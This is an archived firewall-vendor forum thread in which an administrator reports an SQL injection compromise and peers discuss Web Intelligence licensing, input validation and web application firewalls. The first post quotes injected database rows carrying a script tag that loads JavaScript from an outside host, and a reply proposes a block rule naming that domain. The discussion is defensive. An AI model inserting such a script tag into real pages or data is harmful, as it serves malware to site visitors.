PDA

View Full Version : SQL Injection Attack - How to stop it at the R65 firewall?



Spacetrucker
2009-08-13, 19:19
All - R65 HFA 2, I need to deal with an apparent SQL injection attack, below is the code. I just found out that while Web Intelligence is listed in Smart Defense, you need a license for it. Anyway is there a way I can cut SQL injection attacks off at the firewall?

112 27010 Netherlands Antilles<script src=http://n.uc8010.com/0.js></script> 0 NULL <script src=http://n.uc8010.com/0.js></script> 112 40 Europe<script src=http://n.uc8010.com/0.js></script> NULL NULL NULL 0 0 0 0 0 0 <script src=http://n.uc8010.com/0.js></script> NULL NULL 2002-07-01 16:04:07.000

Thanks

belvdr
2009-08-14, 11:11
From talking with my rep, Web Intelligence does not require a license for the SQL Injection prevention. Apprarently, there's a web intelligence product for web servers that requires a license.

Have you tried enabling it and does it block it?

Spacetrucker
2009-08-14, 15:39
From talking with my rep, Web Intelligence does not require a license for the SQL Injection prevention. Apprarently, there's a web intelligence product for web servers that requires a license.

Have you tried enabling it and does it block it?

Your rep is correct, along with lammbo from my other post. Without the WI license it's an all or nothing proposition. I did try enabling the Smart Defense -> Web Intelligence -> Application Layer -> SQL Injection defense against all the web sites, and I was able to. For political reasons, I can't enforce it against all the web sites at the same time. I'll have to do this in one's and two's and see what breaks.

Spacetrucker
2009-10-06, 15:22
I'm back, after learning the hard way this past weekend. We had a sql db get hacked by an sql injection attack. I thought it was protected because I had defined the server that hosts the web front end as a web server on the gateway, and I was running Web Intelligence, with the sql injection protection set to high.

It's a drag to come clean, but the fault lies with me. And maybe my mistake will help someone else avoid it.

It's simple my pen testing was f#cked up. I ran exploit code I found on the web against the site rather than the server. If I had run it against the server the vulnerability would have been exposed.

So here's what I did after getting hacked, and thinking WTF happened.

Here's our setup. We have an IIS 6 web server, that hosts 40 sites. Each site has it's own ip address (we don't use host headers). Each site is defined as a host on the gateway, using one to one static nat.

First I checked the settings on the gateway to make sure of what they were.

Remember I've already defined the server hosting the sites as a web server on the gateway.

So now I defined a site as a web server on the gateway. This particular site resides on a different server.

I ran the sql injection code that we got hacked with, against the server that's defined as a web server again and it succeeded again :(

I ran the same code against the site that's defined as a web server, and it was detected by WI, and the connection was reset, an entry was written to the log file, and I got an email from the gateway :)

My Check Point reseller tells me the license is per server and not per site.
The WI license comes in three flavors, you can cover 3 servers or 10, or unlimited.

I did explain how we're setup to the reseller. And that I was confused by the licensing, was it per server or per site?

I think the question I should have asked my Check Point reseller is "How many ip addresses are covered by the WI license?"

Now I know that WI is based on the ip address.

I've read a few less than favorable comments about SD and WI. And I understand that writing secure code is a requirement.

So if your not using SD and WI, how does your shop protect itself against these types of exploits?

Thorpuse
2009-10-07, 02:47
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....

fwwidgit
2009-10-07, 09:21
Re your question about how to stop such attacks - its unfortunately quite simple - and not so simple at the same time.

Input validation for all SQL statements on the web server applications.

SD / IPS is just a defence mechanism - your applications need to have their own internal defenses as well.

Easy statement to make - not so easy to resolve.

Other thoughts on this though are to ensure that you're providing as little information as possible to your potential attackers. If you let them know you're running IIS (and therefore probably MSSQL in the back) you've put a nice big target on your site. Not entirely familiar with IIS - but I'm assuming you can hide all the web server product information and database info so it becomes a generic system type.

Spacetrucker
2009-10-07, 14:22
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....

Would'nt I need to upgrade to the Blades version?



Re your question about how to stop such attacks - its unfortunately quite simple - and not so simple at the same time.

Input validation for all SQL statements on the web server applications.

SD / IPS is just a defence mechanism - your applications need to have their own internal defenses as well.

Easy statement to make - not so easy to resolve.

Other thoughts on this though are to ensure that you're providing as little information as possible to your potential attackers. If you let them know you're running IIS (and therefore probably MSSQL in the back) you've put a nice big target on your site. Not entirely familiar with IIS - but I'm assuming you can hide all the web server product information and database info so it becomes a generic system type.

I agree, it starts with the code. Regarding information to potential attackers, my bad, I know better.

dsb.nepo
2009-10-07, 17:45
I don't know which platforms your web servers are but I see some solutions.

For apache look into ModSecurity: Open Source Web Application Firewall (http://www.modsecurity.org/)
For IIS serch for urlscan there is also an new version 3.x for IIS7

You can try to extend SmartDefense under 'Web Intelligence' -> 'Malicous Code' -> 'General HTTP Worm catcher'
- add a rule like /suc8010.com/

If the request have a specific user agent you can filter on that.

For a high volume Websites I don't recommend SmartDefense, for low volume it is OK but has many false positive (example corrupt gif/png detection).
To protect clients behind the FW it is OK, even with some false positive.

Spacetrucker
2009-10-07, 22:40
I don't know which platforms your web servers are but I see some solutions.

For apache look into ModSecurity: Open Source Web Application Firewall (http://www.modsecurity.org/)
For IIS serch for urlscan there is also an new version 3.x for IIS7

You can try to extend SmartDefense under 'Web Intelligence' -> 'Malicous Code' -> 'General HTTP Worm catcher'
- add a rule like /suc8010.com/

If the request have a specific user agent you can filter on that.

For a high volume Websites I don't recommend SmartDefense, for low volume it is OK but has many false positive (example corrupt gif/png detection).
To protect clients behind the FW it is OK, even with some false positive.

Have you used urlscan? What I've read hasn't been real positive.
How many hits does a site have to take to be considered high volume?

Thorpuse
2009-10-07, 23:31
Would'nt I need to upgrade to the Blades version?


Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

Spacetrucker
2009-10-08, 11:59
Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

I'm asking because I don't know. Thanks for the tip on Imperva, I'll check that out.

Spacetrucker
2009-10-09, 17:37
Fair point - you'd need to be running R70, but the cost differential should make it cheaper for you to run this way.

Web App Firewalls isn't an area I've had a lot of direct exposure to, but Imperva is a company that often comes up in that area - might be worth looking into them if this is a key requirement.

I've read that 130 count post in Licensing about R70.
boldin writes you have two upgrade options, upgrade to R70 using your existing NGX licenses, or upgrade to the R70 Blades Architecture.
So it appears there are two versions of R70. So would either one of these versions do the trick of eliminating how many servers would be covered by the WI license.

I have an eval license applied right now to test WI, and for us it seems to be working well at blocking a load of stuff besides sql injection.

Thorpuse
2009-10-09, 21:08
I've read that 130 count post in Licensing about R70.
boldin writes you have two upgrade options, upgrade to R70 using your existing NGX licenses, or upgrade to the R70 Blades Architecture.
So it appears there are two versions of R70. So would either one of these versions do the trick of eliminating how many servers would be covered by the WI license.

I have an eval license applied right now to test WI, and for us it seems to be working well at blocking a load of stuff besides sql injection.

There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

RayPesek
2009-10-09, 21:58
Check out Protect Your Website From Hacker Attacks With dotDefender | Applicure Technologies (http://www.applicure.com) as well. Personally, I think ModSecurity with their core rule set works quite well. If this is an SSL site, you can set up ModSecurity as a reverse proxy and have the SSL decryption done on it.

Ray

Spacetrucker
2009-10-12, 17:58
There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

Thanks for squaring me away on the point that it's two different licenses and not two different versions. I just got a quote on the upgrade to the blades technology. And, I've emailed the reseller asking if the WI license with coverage for an unlimited number of servers is included in that quote.



Check out Protect Your Website From Hacker Attacks With dotDefender | Applicure Technologies (http://www.applicure.com) as well. Personally, I think ModSecurity with their core rule set works quite well. If this is an SSL site, you can set up ModSecurity as a reverse proxy and have the SSL decryption done on it.

Ray
Ray thanks a bunch, this looks pretty good. The pricing is around $3000 per server for 3 - 5, and that's a perpetual license. Have you used this product? Are there any downsides, other than the company ceases to exist?

Spacetrucker
2009-10-12, 18:46
Buy WI off the Blades Pricelist - the concept of the number of servers disappears then, AND it's much, much cheaper.

One for the gallery though - I can't see how WI would work and be kept up to date WITHOUT an IPS Blade subscription license, as WI relies on the protections in the IPS blade. Blade Independence? Hmmm... I wonder....


There are not two "versions", there are two licensing schemes. The functionality on old and new licenses is the same. The difference is commercial, not technical - get your reseller/disti/CP rep to quote up the upgrade (you get 100% credit on existing licenses until 31 December!) and you should see that commercially, you save money on the Blades licensing with WI included. Incidentally, if this option does turn out to be more expensive, I'd be very curious to see the details, as WI is used in just about every case study CP uses to prove that allegedly, the Blades pricing is better for customers. It would be brilliant to see a case where even using their best case product scenario that it isn't....

I'm not bitter, just tired of explaining to my customers that they have to pay more for exactly the same as what they've already got, as well as the new "features" which they have no choice but to buy....

My reseller emailed me back, and says that the WI license is in addition to the R70 Blades technology license. My bad, I think I'm misunderstanding what your telling me. Your saying, you're still going to have to pay for a WI license even if you upgrade to the R70 Blades technology, it just cheaper coming off the Blades price list. Is it ok to list the prices from your reseller's quotes in the forum, or is that a breach of etiquette?

Thorpuse
2009-10-12, 18:59
My reseller emailed me back, and says that the WI license is in addition to the R70 Blades technology license. My bad, I think I'm misunderstanding what your telling me. Your saying, you're still going to have to pay for a WI license even if you upgrade to the R70 Blades technology, it just cheaper coming off the Blades price list. Is it ok to list the prices from your reseller's quotes in the forum, or is that a breach of etiquette?

WI on the Blades Price list will cost list $1500 for unlimited web servers. On the NGX price list is will be >$1500, and will cost more depending on the number of web servers defined. The thing you have a factor is the cost of conversion of your other products to blades, which, in every case I've worked on so far, has not been economical without special NSP assistance. Hope this clarifies it.

Biggest thing to understand is that today, this is *purely* a commercial decision. However, I expect that sometime next year once they retire the NGX pricelist that technical limitations will start to kick in - this has already been forecasted for the IPS blade, and I won't be surprised to see it elsewhere, the way that CP is acting at the moment.

RayPesek
2009-10-12, 19:17
We haven't use it yet but are about to begin an eval. It was recommended by a local PCI Qualified Security Assessor. Their success rate for breaking into companies from the Internet is currently at 73% and some of these are very large companies.

Check out some of their scary free tools: https://www.securestate.com/Pages/Free-Tools.aspx If you're familiar with Back Track, they produced and gave away the entire section under Penetration Testing named Fast-Track.

Also note that Web Intelligence generates a LOT of false positives. Simply using words like "control" in a post will generate a block. You really need to go through the words it keys on and get rid of any that might be used in your web traffic.

Ray

Spacetrucker
2009-10-13, 16:22
WI on the Blades Price list will cost list $1500 for unlimited web servers. On the NGX price list is will be >$1500, and will cost more depending on the number of web servers defined. The thing you have a factor is the cost of conversion of your other products to blades, which, in every case I've worked on so far, has not been economical without special NSP assistance. Hope this clarifies it.

Biggest thing to understand is that today, this is *purely* a commercial decision. However, I expect that sometime next year once they retire the NGX pricelist that technical limitations will start to kick in - this has already been forecasted for the IPS blade, and I won't be surprised to see it elsewhere, the way that CP is acting at the moment.

I've been checking out the price lists and I need some help with translating the names of the products that I currently have to the new names.

I'm trying to factor in our other products.

We've got a single R65 SPLAT NGX with the enforcement and management modules on the same box, unlimited users. When I run sysconfig - option 10 - Products Installed. I see VPN-1 Power and SmartCenter installed.

I think this tranlates to the section titled Check Point SmartCenter and VPN-1 Gateway Bundles - Power Series Column - VPN-1 Power and SmartCenter Power in the NGX pricelist.

We've got a Smart Defense license, I don't think this products name has changed.

And we've got a 25 user SecureClient license, what's this translate to now? A search of the price list finds SecureClient mentioned in the Connectra, and a mention of Endpoint security.

northlandboy
2009-10-13, 16:49
I think this tranlates to the section titled Check Point SmartCenter and VPN-1 Gateway Bundles - Power Series Column - VPN-1 Power and SmartCenter Power in the NGX pricelist.

We've got a Smart Defense license, I don't think this products name has changed.

And we've got a 25 user SecureClient license, what's this translate to now? A search of the price list finds SecureClient mentioned in the Connectra, and a mention of Endpoint security.

Best bet is to talk to a reseller about this - it gets complicated.

SmartDefense is now IPS.

SecureClient is going away - support ends at the end of next year I think.

Thorpuse
2009-10-13, 16:49
Welcome to the joys of Blades... :)

SmartDefense translates to the IPS blade. SecureClient hasn't been converted to an equivalent Blades license, so that one stays as it is for this week.

There are a number of SKUs for combined Management/Gateways, one of these should be equivalent, although the Multicore and Unlimited reinterpretations will probably show you the stickershock factor. This is usually the moment when calling your friendly CP sales rep comes in handy, if only so you can ask them to explain why you'll have to pay that much to get the same if not less functionality....

Spacetrucker
2009-10-13, 17:15
We haven't use it yet but are about to begin an eval. It was recommended by a local PCI Qualified Security Assessor. Their success rate for breaking into companies from the Internet is currently at 73% and some of these are very large companies.

Check out some of their scary free tools: https://www.securestate.com/Pages/Free-Tools.aspx If you're familiar with Back Track, they produced and gave away the entire section under Penetration Testing named Fast-Track.

Also note that Web Intelligence generates a LOT of false positives. Simply using words like "control" in a post will generate a block. You really need to go through the words it keys on and get rid of any that might be used in your web traffic.

Ray

Ray thanks for the link, these tools look like they could be fun, used responsibly of course.


Best bet is to talk to a reseller about this - it gets complicated.

SmartDefense is now IPS.

SecureClient is going away - support ends at the end of next year I think.

What are they replacing SecureClient with?
I'm talking to my reseller, trying to ask questions the right way, which can be stretch for me at times ;)

Thorpuse
2009-10-13, 17:35
What are they replacing SecureClient with?
I'm talking to my reseller, trying to ask questions the right way, which can be stretch for me at times ;)

Product-wise, SC is being replaced by a thing called Endpoint Connect. It's been discussed on here before.

Licensing-wise, the SecureAccess license on the NGX pricelist is the current remote access license. Your reseller will need to quote this, but you can quote it for any number of users, which is an improvement on the fixed numbers for SC licenses. You should also get 100% credit for this, so the pricing should be reasonable. Note that you don't have to upgrade that license (yet...).

Spacetrucker
2009-10-14, 11:45
Product-wise, SC is being replaced by a thing called Endpoint Connect. It's been discussed on here before.

Licensing-wise, the SecureAccess license on the NGX pricelist is the current remote access license. Your reseller will need to quote this, but you can quote it for any number of users, which is an improvement on the fixed numbers for SC licenses. You should also get 100% credit for this, so the pricing should be reasonable. Note that you don't have to upgrade that license (yet...).

I printed out the price list and spoke to my reseller. The initial quote is for the SMU007/SG805 because our current license is for an unlimited number of gateways and users. I suggested that the SM1003/SG405 may be a better fit for us.

He explained that Check Point may not give us a 100% credit for that bundle because it's a downgrade from what we already have.